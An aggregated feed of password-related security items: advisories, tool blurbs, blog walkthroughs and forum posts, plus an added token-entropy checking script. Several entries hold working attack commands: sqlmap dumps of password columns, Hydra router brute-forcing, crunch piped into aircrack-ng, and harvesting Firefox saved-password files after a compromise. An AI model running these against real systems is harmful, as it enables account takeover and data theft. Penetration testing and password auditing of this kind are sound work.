229 items tagged "password"
-
-
14:46
»
Packet Storm Security Exploits
The PcwRunAs software available from the PC-Welt website is prone to a trivial password recovery attack that allows local users to obtain passwords encrypted with the pcwRunAsGui.exe. pcwRunAs versions 0.4 and below are affected.
-
14:30
»
Hack a Day
The biggest benefit to using the BeagleBone is its 700 MHz ARM processor. If you're just messing around with basic I/O that power is going unused, but [Nuno Alves] is taking advantage of its power. He built a PDF password cracker based on the $85 development board. We recently saw how easy it is to [...]
-
-
7:01
»
Hack a Day
Like many businesses out there, [Joonas Pihlajamaa’s] employer requires him to change his password every few months. Instead of coming up with a complex, yet easy to remember password again and again, he built a small USB device to do the work for him. He dismantled an old USB memory stick, fitting it with an [...]
-
-
20:14
»
Packet Storm Security Advisories
Onapsis Security Advisory - If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), and the Security Kernel is enabled and SignonSecurity is configured, then it is possible to retrieve the password of arbitrary users.
-
-
16:57
»
Packet Storm Security Recent Files
A small application built to test the performance of a POP3 authentication system using a large number of concurrent connections. It can also be used to try many passwords against a POP3 server. It is capable of using up to 1024 sessions (or more using multiple processes). At that level of concurrency it can reduce Internet connections to a crawl and greatly increase the load on the server.
-
-
18:25
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
7:17
»
Carnal0wnage
So assuming we have some sort of SQL Injection in the application (Blind in this case) and we've previously dumped all the available databases (--dbs), we now want to search for columns with 'password' in them.
To search all databases for 'password'
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -C 'password'
To search a specific database for 'password'
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -D 'MYDATABASE' -C 'password'
**Note that once sqlmap was done with 'MYDATABASE' it checked the rest of the DBs.**
[15:28:17] [INFO] fetching columns LIKE 'password' for table 'dbo.mytable' on database 'MYDATABASE'
You'll get asked:
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
You'll want to give it a 1 first time around, it will probably give you stuff like this:
[15:27:38] [INFO] retrieved: 2
[15:28:22] [INFO] retrieved: Password
[15:29:18] [INFO] retrieved: PrintPasswords
We now know that we want to go back and enumerate/dump the column values from dbo.mytable and database MYDATABASE to see if there is anything good there. Most likely there is also a userID or LogonId in there we need to extract as well.
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --columns -T dbo.mytable -D MYDATABASE --time-sec=1
You could also just do a dump if you want to start grabbing data.
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1
If you just want to pull a certain number of rows, you can also give a --start and --stop switch (--start=1 --stop=10) <-- sometimes works, sometimes doesn't. Not sure what's up with that.
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
If you just want to pull out certain columns you can do something like this (assuming columns LogonId and Password):
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -C LogonId,Password -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
I'm sure I just committed some SQLMap sins, so please correct me (like last time) :-)
-CG
-
-
8:15
»
Packet Storm Security Recent Files
This is a Perl script that generates a list of passwords from user-supplied input on the command line. It gives a tester the ability to create various permutations of a given password for testing.
-
-
10:09
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
18:42
»
Packet Storm Security Misc. Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
16:56
»
Packet Storm Security Exploits
The Singtel 2Wire gateway router comes shipped with a hardcoded password that cannot be changed and suffers from a lack of cross site request forgery protection.
-
-
9:44
»
Packet Storm Security Recent Files
This article will show how to use Hydra to check for weak passwords. Hydra tries all possible password combinations against a server on the Internet until a valid one is found to log in to the server. It is a powerful tool for hackers and network administrators alike.
-
-
22:56
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
15:00
»
Sophos security news
Sophos launches free mobile security toolkit as survey reveals lack of consumer concern regarding security issues on mobile devices
-
-
17:04
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
8:32
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
5:04
»
Carnal0wnage
Dave Ferguson has beaten up on forgotten/reset password functionality for some time and recently participated in an OWASP podcast where he discussed these problems. The podcast reminded me of some techniques I've used in the past which have been successful and may be worth sharing. Accessing other user's accounts with insecurely coded forgot/reset password functionality is more common than you might think.
This post focuses on analyzing entropy and inline password resets, two major problems with forgot/reset password functionality. To do this, we have to automate both requesting a forgot password hundreds of times and parsing through all of the e-mails we receive. Thanks to the recently added macro support now available in Burp (thanks PortSwigger), less effort is required on our part when an application employs anti-automation features to prevent such attempts.
For those not familiar with BurpSuite's Macro support, let's walk through this.
So here is a picture of the email reset we've been sent:

To initiate a password reset request it is a four part request & response pair sequence. This sequence is saved in our proxy history. We need to navigate to Options > Sessions > Macros > New and highlight the four messages saved in the proxy history to create and configure the new macro.
Take a look at the screenshot below:

Okay, now we need to configure each individual request/response to extract the data we want. We have to grab a JSESSIONID and a struts token. Let's highlight the first request/response and configure it.

Example of configuring one of the items

You'll notice that for the first request I've chosen to not use cookies in the cookie jar. This is because I want to start the sequence clean and without a cookie.

Notice the struts.token.name and struts.token are dynamic and changing so we derive these from the response. The rest are preset values like email and birthdate (no, not my real birthdate). One thing that is important to notice is that I've decided to uncheck URL encode for the email portion. It is already URL encoded so no need. Otherwise it will cause problems.

Name the Macro
The next piece requires you to add the macro to a session rule. Again Options > Sessions > Session Handling > New. Highlight the macro you'd like to use.

Next, you'll need to add the pages to scope:

Now send the original, first request (I do this at the proxy history portion of Burp) over to intruder, select null payloads and set it for a number that is large enough to collect a big portion of passwords so we can review entropy. You'll see below that Intruder is configured to send the password reset sequence 800 times. Again, this will initiate the macro each time, so you are essentially resetting the password 800 times.

Next we need to retrieve the emails from gmail and review them for entropy. Here is a script I've written to retrieve emails from gmail, parse for the password values and write to a file called tokens.txt:
Lines 11-17: Line 12: File we will place all of our emails in (make sure you create an inbox folder)
Line 13: Initialize Pop class
Line 14: Enable SSL
Line 15: Replace with your username and password
Line 16: Call the check_for_emails method with the pop obj
Lines 20-27: Lines 21-22: If we have no emails, print that fact out to the screen
Line 24-25: We have emails, print that fact to the screen and call place_emails_into_file method with the pop object.
Lines 31-36: Line 31: Iterate through the pop array
Line 32: Open the file (line 12)
Line 33: Write the messages to the file
Line 36: Call the create_file_with_tokens method
Lines 40-53: Line 41: Create a new_file object which is a file called tokens.txt
Line 42: Create a read_file object which reads the inbox/emails.txt file from Line 12
Line 43: Begin reading each line from the read_file
Lines 44-46: If the line matches the "password: somepassword" write it to a file.
Line 53: Kick the whole thing off
Review the tokens.txt file
We can see that the new passwords sent aren't very random. We can load this in Burp Sequencer but there really isn't any point when it is this easy. It is obvious that the developer has two separate arrays of words and another array of numbers. They pick "randomly" from that pile and concatenate the values. Here is the actual line of code I wrote to do this, and yes, this is a real-life example that I've come across:

Factors that could slow us down:
1) If we can't enumerate e-mail addresses somehow. An example of enumeration would be if you type in a username/e-mail address and the site tells you it doesn't exist. Now we know who DOES exist on the system.
2) This particular site requires a birthdate along with the email address. This is difficult but not impossible. If we know the e-mail address exists it is a matter of guessing the birthdate (automate w/ Intruder).
3) After we've reset other users' passwords, we need to guess the password (made MUCH easier by reviewing the entropy). If an account lock-out policy is enforced (after a small number of incorrect password submissions) the account may be locked out, leaving us without access. That is no fun.
Even if the reset or forgotten password function doesn't send us a clear-text password it may send us a reset link. It is important to review the randomness of that link.
Here is an example of loading the tokens file in sequencer:

Summary:
We've bypassed the struts token and multi-flow password resets which might have been intended to slow us down. We've collected all of our emails and parsed them for passwords/tokens/links. We've manually (in this case) reviewed the entropy, but we can also do this with Sequencer. Now we have a way to guess passwords more efficiently, and in combination with other flaws this leaves us just a short period of time from compromising accounts.
~cktricky
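As an added example (not code from the post, and not Burp's Sequencer), here is the batch review the post does by eye, written for a developer checking their own reset-token generator: it models the word-list construction the post describes using constructed word lists, estimates the effective keyspace from duplicate counts in a collected batch (all a reviewer holding only tokens.txt can see), and runs the same checks against tokens from Python's `secrets` module for comparison. The word lists, list sizes and token shapes are assumptions; the real application's arrays are unknown.

```python
"""Batch review of password-reset tokens for low entropy.

Added example, not code from the Carnal0wnage post. It models the weak
generator the post describes (an array of words, a second array of words
and an array of numbers, picked from and concatenated) so a reviewer can
see how the flaw shows up in a collected batch, and applies the same
checks to tokens produced with secrets.token_urlsafe().
"""
import math
import random
import re
import secrets
from collections import Counter

# Constructed stand-ins for the developer's arrays (8 x 8 x 90 = 5760 outputs).
FIRST_WORDS = ["happy", "sunny", "blue", "quick", "brave", "calm", "lucky", "red"]
SECOND_WORDS = ["tiger", "river", "cloud", "stone", "maple", "eagle", "coral", "wolf"]
NUMBERS = [str(n) for n in range(10, 100)]

# Letters followed by digits: the shape a word-list-plus-number token takes.
WORD_DIGITS = re.compile(r"([a-z]+)(\d+)")


def keyspace_bits(*pools):
    """Hard upper bound on the entropy of a pick-and-concatenate scheme."""
    total = 1
    for pool in pools:
        total *= len(pool)
    return math.log2(total)


def weak_reset_password(rng):
    """The anti-pattern: random picks from tiny lists, joined together."""
    return rng.choice(FIRST_WORDS) + rng.choice(SECOND_WORDS) + rng.choice(NUMBERS)


def weak_batch(n, seed=1):
    """n weak tokens from a seeded PRNG so the demonstration is repeatable."""
    rng = random.Random(seed)
    return [weak_reset_password(rng) for _ in range(n)]


def strong_batch(n, nbytes=16):
    """n tokens the way a reset token should be made: 128 bits from the OS CSPRNG."""
    return [secrets.token_urlsafe(nbytes) for _ in range(n)]


def analyze_tokens(tokens):
    """Checks a reviewer can run on a collected tokens.txt without the source."""
    n = len(tokens)
    counts = Counter(tokens)
    duplicates = n - len(counts)
    # The letters part ("stem") of a word+digits token is the concatenated
    # word pick; few distinct stems across many tokens means fixed word lists.
    stems = set()
    wordlike = 0
    for tok in tokens:
        m = WORD_DIGITS.fullmatch(tok)
        if m:
            wordlike += 1
            stems.add(m.group(1))
        else:
            stems.add(tok)
    # Birthday-bound estimate of the keyspace K: with k duplicates among n
    # draws, K ~ n^2 / (2k). With no duplicates we only know K >= n^2 / 2.
    if duplicates:
        est_bits, lower_bound = math.log2(n * n / (2 * duplicates)), False
    else:
        est_bits, lower_bound = math.log2(n * n / 2), True
    return {
        "count": n,
        "duplicates": duplicates,
        "wordlike_ratio": wordlike / n,
        "distinct_stems": len(stems),
        "estimated_bits": est_bits,
        "estimate_is_lower_bound": lower_bound,
    }


def findings(report):
    """Human-readable problems; an empty list means nothing stood out."""
    out = []
    if report["duplicates"]:
        out.append(f'{report["duplicates"]} duplicate tokens in {report["count"]}: '
                   f'keyspace is roughly 2^{report["estimated_bits"]:.1f}')
    if report["wordlike_ratio"] >= 0.5:
        out.append("most tokens are words followed by digits (dictionary-built)")
    if report["distinct_stems"] < report["count"] / 4:
        out.append(f'only {report["distinct_stems"]} distinct word parts: fixed word lists')
    return out


if __name__ == "__main__":
    print(f"scheme upper bound: {keyspace_bits(FIRST_WORDS, SECOND_WORDS, NUMBERS):.1f} bits")
    for name, batch in (("weak", weak_batch(800)), ("secrets", strong_batch(800))):
        rep = analyze_tokens(batch)
        print(name, rep, findings(rep) or ["no findings"])
```

With 800 samples the weak scheme shows dozens of duplicates and the birthday estimate lands near the true 12.5-bit keyspace, while the `secrets` batch has none and only yields a lower bound; the duplicate count is the one signal that needs no knowledge of the generator at all.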
-
-
11:51
»
Packet Storm Security Exploits
This Metasploit module will reset the admin password on a 2wire wireless router. This works by using a setup wizard page that fails to check whether a user is authenticated and is not removed or blocked after first access.
-
-
2:05
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
-
-
8:46
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
-
13:22
»
Packet Storm Security Recent Files
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro. This is the community enhanced version.
-
-
11:48
»
Packet Storm Security Advisories
Cisco Security Advisory - Cisco Network Registrar Software Releases prior to 7.2 contain a default password for the administrative account. During the initial installation, users are not forced to change this password, allowing it to persist after the installation. An attacker who is aware of this vulnerability could authenticate with administrative privileges and arbitrarily change the configuration of Cisco Network Registrar.
-
10:01 Hack a Day
The power that a Graphics Processing Unit presents can be harnessed to do some dirty work when trying to crack passwords. [Vijay] took a look at some of the options out there for cracking passwords and found that utilizing the GPU produces the correct password in a fraction of the time. On a Windows machine [...]
23:09 SecuriTeam
Cisco Secure ACS contains an Unauthorized Password Change Vulnerability.
20:38 Packet Storm Security Recent Files
PACK (Password Analysis and Cracking Kit) is a toolkit that allows researchers to optimize their password cracking tasks, analyze previously cracked passwords, and implements a novel attack on corporate passwords using minimum password policy. The goal of this toolkit is to assist in automatic preparation for the "better than bruteforce" password attacks by analyzing common ways that people create passwords. After the analysis stage, the statistical database can be used to generate attack masks for common tools such as Hashcat, oclHashcat, and others.
6:04 Hack a Day
shackspace member [@dop3j0e] found himself in a real bind when trying to recover some data after his ThinkPad’s fingerprint scanner died. You see, he stored his hard drive password in the scanner, and over time completely forgot what it was. Once the scanner stopped working, he had no way to get at his data. He [...]
12:02 Hack a Day
In his line of work, Instructables user [Harrymatic] sees a lot of Toshiba laptops come across his desk, some of which are protected with a BIOS password. Typically, in order to make it past the BIOS lockout and get access to the computer, he would have to open the laptop case and short the CMOS [...]
15:00 Hack a Day
Here’s a guide for recovering protection passwords from ATA hard drives (translated). These passwords are stored in a special area of the hard disk that also contains the firmware for the device. Normally you can’t get at them but [Supersonic] walks us through a method used to grab the data off of a Western Digital [...]
23:24 Packet Storm Security Advisories
Cisco Security Advisory - Tandberg C Series Endpoints and E/EX Personal Video units that are running software versions prior to TC4.0.0 ship with a root administrator account that is enabled by default with no password. An attacker could use this account in order to modify the application configuration or operating system settings. Resolving this default password issue does not require a software upgrade and can be changed or disabled by a configuration command for all affected customers. The workaround detailed in this document demonstrates how to disable the root account or change the password.
12:24 Carnal0wnage
You probably missed it but jduck recently snuck in a VNC mixin and vnc_login module to the trunk.
This is awesome because before that I had to use Immunity's VAAseline to do VNC bruteforcing. But now you can just use vnc_login.
So the scenario is you find yourself on the other end of a VNC server.
It's tedious to password guess like this.
Instead let's use the metasploit module and throw a dictionary attack against the VNC server.
Looks like the VNC no auth module had been ported and stuck in there too :-)
-CG
5:39 Sophos security news
Always choose a hard-to-guess non-dictionary word as your Twitter password, and never use the same password on multiple websites.
15:43 remote-exploit & backtrack
Hi, I can easily crack my WPA password which I set to a dictionary word recently.
However I now want to change the password to password123.
I have heard John the Ripper can add 123 ...etc to each individual passphrase so I would like to do that.
After catching the handshake I notice that there are 4 packets called 'KEY'.
Is this the 4-way handshake?
If so, how do I get the 'hash' or password information from my handshake and transfer it manually to my Windows machine to experiment with? Or what do I need to copy over?
Thanks
19:00 Packet Storm Security Tools
The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.
10:00 Hack a Day
[Dogbert] took a look at the security that goes into BIOS passwords on many laptops. He starts off with a little background about how the systems work. People are bound to forget their passwords, so when you enter a wrong one three times in a row you get a message similar to the one above [...]
13:07 Hack a Day
Recently, research students at Georgia Tech released a report outlining the dangers that GPUs pose to the current state of password security. There are a number of ways to crack a password, all with their different pros and cons, but when it comes down to it, the limiting factor in all of these methods is [...]
8:00 Hack a Day
Irongeek.com is hosting an online class on password exploitation. The event was a fundraiser called ShoeCon, but they are hosting the entire series for everyone to share. Not only are the videos there, but you can download the powerpoint slides as well. There is a massive amount of information here on various topics like Hashcat, [...]
11:47 SecuriTeam
Usage of weak random number generation in password reset functionality allows predicting the password reset token and the randomly generated password, which results in account takeover.
12:07 SecuriTeam
An email injection vulnerability discovered in MyBB allows injecting, e.g., BCC mail headers into password reset emails.
15:01 Packet Storm Security Tools
Netkeys generates the factory password for Netopia routers which bypasses any required admin password. Included is a now obsolete default WEP key generator. Win32 exe included with sources.
4:21 remote-exploit & backtrack
Hello there,
(I used the board search before :) )
So, I have one question:
Is there a tool on BackTrack that supports faster password recovery via solid state disk and rainbow tables? Because I read of specially prepared rainbow tables (on h-online[dot]com), which are able to have better performance in recovering NTLM passwords.
Thanks in advance,
tiger
11:58 Carnal0wnage
Nothing earth shattering, but since this is a place for my notes...
Sometimes while you are on a box and pilfering through all the documents doesn't yield anything useful for you to move laterally, you can sometimes grab the Firefox saved passwords. Lots of times someone will save their password to the corporate OWA, wiki, helpdesk page, or whatever. Even if it doesn't give you a *great* lead you'll at least get an idea if they are a password re-user or not.
So how to do it?
Actually it's simple. Inside of the mozilla\firefox directory will be somethingrandom.default. Inside that folder you'll find:
key3.db
signons.sqlite
If there is no master password set, all you have to do is replace the files on your test VM with the two files you downloaded, open Firefox, go to Preferences, Security, and do a View Saved Passwords.
I think there are some fancy Firefox plug-ins that can pull this info out and I'm sure there are some binaries you can push up that will dump this for you as well. But this is quick and easy and you're probably already downloading files (at least you probably *should* be) anyway...
-thanks to Mubix for telling me about this.
20:01 Packet Storm Security Tools
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes. On top of this, many other hash types are added with contributed patches, and some are added in John the Ripper Pro.
16:58 remote-exploit & backtrack
I am wanting to change my clock time and I noticed I am not allowed to do so.
When I want to do stuff from root at the command line it allows me; I changed the default password of toor to my password after boot and I can do command line Linux admin things without problem.
Every time I try something that involves KDE root access it rejects my password.
Thanks to anyone who can help on this.
17:00 Packet Storm Security Advisories
It is impossible to maintain a secure session with Twitter, for multiple reasons. Additionally, once a session has been hijacked, it is possible for the attacker to maintain control over the account (not just the session) indefinitely, unless the user changes their password. This is because the session cookie has the same lifetime as the password.
22:00 SecuriTeam
This issue may make it much easier to convince a victim to submit web application credentials to the attacker's site.
6:01 remote-exploit & backtrack
I have two password tables:
mens_name.lst
Code:
Aaron
Abdiel
Abdullah
Abel
Abraham
Abram
Adam
Adan
Addison
Aden
Aditya
Adolfo
Adonis
Adrian
Adriel
Adrien
Agustin
...etc
and dob.lst (dates of birth)
Code:
25321
32521
2531921
3251921
1921/25/03
25/03/1921
03/25/1921
25/3/21
3/25/21
25/3/1921
3/25/1921
1921-25-03
25-03-1921
03-25-1921
25-3-21
3-25-21
25-3-1921
3-25-1921
1921.25.03
25.03.1921
03.25.1921
...etc
my objective is to merge the two so i have a single list looking like this:
Code:
Aaron25321
Aaron32521
Aaron2531921
Aaron3251921
Aaron1921/25/03
Aaron25/03/1921
Aaron03/25/1921
Aaron25/3/21
..etc
Abdiel25321
Abdiel32521
Abdiel2531921
Abdiel3251921
Abdiel1921/25/03
Abdiel25/03/1921
Abdiel03/25/1921
Abdiel25/3/21
..etc
Abdullah25321
Abdullah32521
Abdullah2531921
Abdullah3251921
Abdullah1921/25/03
Abdullah25/03/1921
Abdullah03/25/1921
Abdullah25/3/21
....etc
If anybody knows how to do this and would like to share the info with me I'd be so grateful. I'd also quite happily share the finished product with you :)
regards imcookie
18:21 remote-exploit & backtrack
I have an ASUS P6T7 WS SuperComputer motherboard with 4 nvidia 9800GTX+ cards in it and I installed the aircrack-cuda program I learned about on these forums **.
I can rip through passwords using John The Ripper at about 200,000K/s but the program misses the password of a known .cap file that I have.
When I run aircrack-ng (normal) using a word list of all English words I can crack the capture easily, but when running the CUDA enabled version I get to the end of the list without ever finding the password.
Is this a known issue or did I do something wrong?
I googled the problem but I always end up back at these forums with no answer.
I am new to forums in general so please be gentle if I did it wrong and just made an ass out of myself.
** howtos/23208-aircrack-ng-cuda-wpa-2-psk-hacking-backtrack-4beta.html
18:00 remote-exploit & backtrack
Hello, could somebody please tell me how I'm able to totally reset my password? My laptop conveniently saved my password but I cannot remember it so now I need to totally reset it.
Regards
AssosutsmoosE
6:56 Carnal0wnage
mindless foursquare fun goes metasploit style...
msf > use auxiliary/admin/foursquare
msf auxiliary(foursquare) > info
Name: Foursquare Location Poster
Version: $Revision:$
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
CG
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD password yes foursquare password
Proxies no Use a proxy chain
RHOST api.foursquare.com yes The target address
RPORT 80 yes The target port
USERNAME username yes foursquare username
VENUEID 185675 yes foursquare venueid
VHOST no HTTP server virtual host
Description:
Fuck with Foursquare, be anywhere you want to be by venue id
References:
http://groups.google.com/group/foursquare-api
http://www.mikekey.com/im-a-foursquare-cheater/
msf auxiliary(foursquare) >
msf auxiliary(foursquare) > set USERNAME notmyusername@host.com
USERNAME => notmyusername@host.com
msf auxiliary(foursquare) > set PASSWORD notmypassword
PASSWORD => notmypassword
msf auxiliary(foursquare) > set VENUEID 9186
VENUEID => 9186
msf auxiliary(foursquare) > run
[*] HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Date: Fri, 19 Mar 2010 13:59:28 GMT
Content-Length: 1311
Server: nginx/0.7.64
Connection: keep-alive
Fri, 19 Mar 10 13:59:28 +0000OK! We've got you @ Washington Monument. This is your 1st checkin here!9186Washington Monument79199Parks & Outdoors:Sculpture SNIP
[*] Auxiliary module execution completed
You can get the module here:
http://code.google.com/p/carnal0wnage/source/browse/trunk/msf3/modules/auxiliary/admin/random/foursquare.rb
17:00 Packet Storm Security Advisories
Secunia Research has discovered a security issue in Quicksilver Forums, which can be exploited by malicious, local users to disclose sensitive information. The application passes the database password via the command line to the mysqldump utility, which may disclose the password via the process list.
3:51 remote-exploit & backtrack
Hi,
Last week I decided to check if my network was secure "enough". I got my WPA handshake within seconds (which is quite acceptable). I then got down to trying to crack it.
I used all the dictionaries I could get my hands on to try and brute-force my way in but found nothing. So far so good. But I still wasn't convinced.
Through some social engineering, and after a few pints of lager, I tricked myself into telling me that the password was made of a 10 digit mixture of letters and numbers. I therefore tried a different way:
/pentest/password/crunch 10 10 "abcdefghijkl.......1234567890" | aircrack-ng ..... wpa-01.cap
After something like 4 days of scanning at 385 keys/second it had barely just started the 3rd digit. This made me feel a lot safer.
Question: Are there "faster" ways other than crunch to get to a 10 digit password by checking every possible permutation, or may I assume that no one is going to have the time to crack my password (at least for the next few hundred years)???
Thanks
8:22 Packet Storm Security Recent Files
Secunia Research has discovered a security issue in Employee Timeclock Software, which can be exploited by malicious, local users to disclose sensitive information. The security issue is caused by the application passing the database password via the command line to the mysqldump utility, which can potentially be exploited to disclose the password via the process list. Version 0.99 is affected.
3:35 remote-exploit & backtrack
Hi,
I have a book in WinRAR format which is protected with a password. It takes a very great deal of time when the standard software for removing the password is used, you know. Do you know if another way exists that is faster and more reliable for removing the password?
Thank you in advance.
21:10 remote-exploit & backtrack
Hello all,
My management has approved an audit of AD accounts looking for weak passwords.
Since I have the server and backups I would have access to the NTDS.DIT file; is there a way to extract password hashes directly from it? I'm trying to avoid running LC or fgdump on the Active Directory domain controller.
I've searched high and low and have not been able to find an answer.
22:44 remote-exploit & backtrack
Hello,
I see lots of videos on how to hack WEP. Actually that's basically what I see on here and on other video sites. My question is: what's next? After you hack the victim's WEP, then what do you do? OK, you have their password. So what's the big deal to get their password to access their internet?
I don't see any other videos for this next feature. All I see is how to hack WEP. Can someone tell me what's next so I can start to do some research please?
I did see a video where someone took over their computer and I've seen a video about something like a social network hack (not sure if that's the correct way of saying it though). But what's next after you hack their WEP key?
Thanks
Big Mike
14:00 Packet Storm Security Tools
EFIPW is a tool that can be used to decode and modify Apple EFI firmware passwords via the command line. It is designed after the non open source OFPW utility and is designed to work on Intel machines running Leopard or newer. Useful for lab deployments (setting the firmware password of machines as a post install item) and pen tests (recovering the EFI firmware password).
14:29 remote-exploit & backtrack
Hi everyone,
I have a small problem with john. I tried to crack my system password, but when I give john the /etc/passwd file, already unshadowed, the response from the terminal is:
NO PASSWORD HASHED LOADED.
Why is that?
I repeat that I have already unshadowed the password file.
Thanks for your help.
4:29 remote-exploit & backtrack
Hi!
I've got a little question guys.
I've installed my BackTrack 4 on VM Workstation, works perfect so far!
Now I wanted to crack the password of my Windows account with chntpw.
But I've got a little problem :p.
I need to go to the 'disk' where my Windows is on, like hda1 or sda1, ...
But like I said I've installed BackTrack on VM Workstation, and when I go into a terminal and do cfdisk to see my drives (right?) I only see the 'virtual' drives, so not the drive Windows is on.
So my question: is it possible to crack the Windows password with BackTrack on VM Workstation? Or do I need to run the live CD?
Thx!
13:54 remote-exploit & backtrack
Hey,
I was just wondering if anyone had an easy way of pulling from the Username column and putting it into 1 .txt file and then pulling from the password column and putting it into another .txt file? The following is the website I would like to do this from. Thanks in advance for looking.
http://www.phenoelit-us.org/dpl/dpl.htmll/dpl.html
17:18 remote-exploit & backtrack
For the past two weeks I have been messing with cracking WPA/WPA2 networks. I have scoured the forums here as well as googled enough that it now only suggests WPA related topics lol.
But from what I've concluded, it seems that WPA2 is quite possibly as secure as we need as long as you have a secure password.
My rationale is that because a person can literally make anything their password, most wordlists would not be able to crack it. If someone makes their password with just their last name and, say, their birthday (i.e. Martin04221966) most password lists would not be able to crack that.
So, I guess my overall question is for someone to correct me if I'm wrong in saying that if a password includes a proper noun or multiple words plus numbers, the WPA attack would not be able to crack the password.
11:12 remote-exploit & backtrack
Try my suggestion (crunch + aircrack-ng without a dictionary)
/pentest/passwords/crunch/./crunch 9 9 | aircrack-ng -b (BSSID) -w - /root/.gerix-wifi-cracker/sniff_dump-*.cap
I got 100%
4:00 darkc0de
Can somebody help me decrypt this password?
16:01 remote-exploit & backtrack
Hi everyone,
I've been trying to increase my knowledge of network penetration to keep my network secure and so far these are the things I have done:
WEP hack, WPA hack then crack with GPU acceleration, ARP poisoning to sniff out passwords, Passive URL sniffing
However I'm interested to see what I can do further with my network, e.g:
1. Brute force my router password
2. Gain access to files on my computer network: password protected shared file (I've got WinXP, Win7, OSX, Ubuntu server connected)? Would this involve a way of obtaining an LM hash and then bruteforcing it? Something like ophcrack
3. Backdoors to gain access to all my files (not just the password protected shared ones)
4. Hack my homegroup.
I would really appreciate some keywords that I can use to search these forums and google.
5:36 remote-exploit & backtrack
Hi friends,
I'll show you a simple attack against a router using Hydra; this is done through the console, not a GUI.
* open the console and type:
# hydra -l "admin" -P wordlist.txt -vV -s 80 -f 192.168.1.1 http-get /
Explanation:
( -l ) stands for the username (admin); most routers have admin as the username; to be sure, google your router's brand.
( -P ) is for the password list (if your password list has a different name, replace wordlist.txt with yours).
( -vV ) shows the login and password at each attempt. In addition it uses an insistent mode.
( -s ) is the port to attack; routers communicate on port 80.
( -f ) tells Hydra to finish the job as soon as it has found the combination.
The final ( / ) I'm not sure about, but during the tests I did I had to include it.
*** If the password is in your password list, Hydra will give you the combination at the end: User + Password.
Have fun
GD